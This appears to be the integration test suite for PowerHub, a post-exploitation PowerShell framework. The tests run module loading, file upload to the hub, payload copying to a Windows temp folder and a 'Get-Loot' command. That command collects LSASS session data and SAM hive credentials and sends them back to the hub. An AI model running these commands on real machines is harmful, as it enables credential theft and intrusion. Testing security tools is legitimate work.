def test_load_hubmodule(backend): out = execute_cmd(backend("lhm psmod53|fl;Invoke-Testfunc53")) assert "Test53" in out assert "psmod53" in out assert re.search("Name *: .*psmod53.ps1\r\n", out) assert re.search("Type *: ps1\r\n", out) assert re.search("N *: 72\r\n", out) assert re.search("Loaded *: True\r\n", out)
def test_load_hubmodule_range(backend): out = execute_cmd( backend('$p="72-74,77";lhm $p;Invoke-Testfunc53;' + "Invoke-Testfunc99;Invoke-Testfunc47;Invoke-Testfunc72;")) # I don't understand the order of the modules assert "Test53" in out assert "Test99" in out assert "Test47" in out assert "Test72" in out
def copy_and_execute(filename, payload, interpreter=""): import tempfile import subprocess if isinstance(payload, str): tmpf = tempfile.NamedTemporaryFile('w', delete=False) else: tmpf = tempfile.NamedTemporaryFile('wb', delete=False) tmpf.write(payload) tmpf.close() try: execute_cmd(f"ssh win10 del C:/Windows/Temp/{filename}") except subprocess.CalledProcessError: # this happens if the file does not exist pass execute_cmd(f"scp {tmpf.name} win10:C:/Windows/Temp/{filename}") out = execute_cmd(f"ssh win10 {interpreter} C:/Windows/Temp/{filename}") return out
def test_upload(backend): from powerhub.directories import UPLOAD_DIR testfile = "testfile-%030x.dat" % random.randrange(16**30) out = execute_cmd( backend(('$p=Join-Path $env:TEMP "%s";' + '[io.file]::WriteAllBytes($p,(1..255));' + 'pth $p;rm $p') % testfile)) time.sleep(1) assert "At line:" not in out # "At line:" means PS error with open(os.path.join(UPLOAD_DIR, testfile), "rb") as f: data = f.read() assert data == bytes(range(1, 256)) out = execute_cmd(backend('$p="FooBar123";$p|pth -name %s;' % testfile)) time.sleep(1) assert "At line:" not in out # "At line:" means PS error with open(os.path.join(UPLOAD_DIR, testfile + ".1"), "rb") as f: data = f.read() assert data == b"FooBar123"
def test_get_loot(backend): from powerhub import sql loot_count = len(sql.get_loot()) out = execute_cmd(backend('Get-Loot')) assert "At line:" not in out # "At line:" means PS error # for i in range(60): # time.sleep(1) # loot = sql.get_loot() # if (loot and loot[0].lsass and loot[0].hive and loot[0].sysinfo): # break # assert i < 59 loot = sql.get_loot() assert loot_count + 1 == len(loot) loot = loot[-1] assert "Administrator" in loot.hive assert "500" in loot.hive assert "Microsoft Windows" in loot.sysinfo assert "isadmin" in loot.sysinfo assert "session_id" in loot.lsass
def test_list_hubmodules(backend): out = execute_cmd(backend("lshm")) for i in range(MAX_TEST_MODULE_PS1): assert "psmod%d" % i in out
def test_start(backend): out = execute_cmd(backend("")) assert "Adrian Vollmer" in out assert "Run 'Help-PowerHub' for help" in out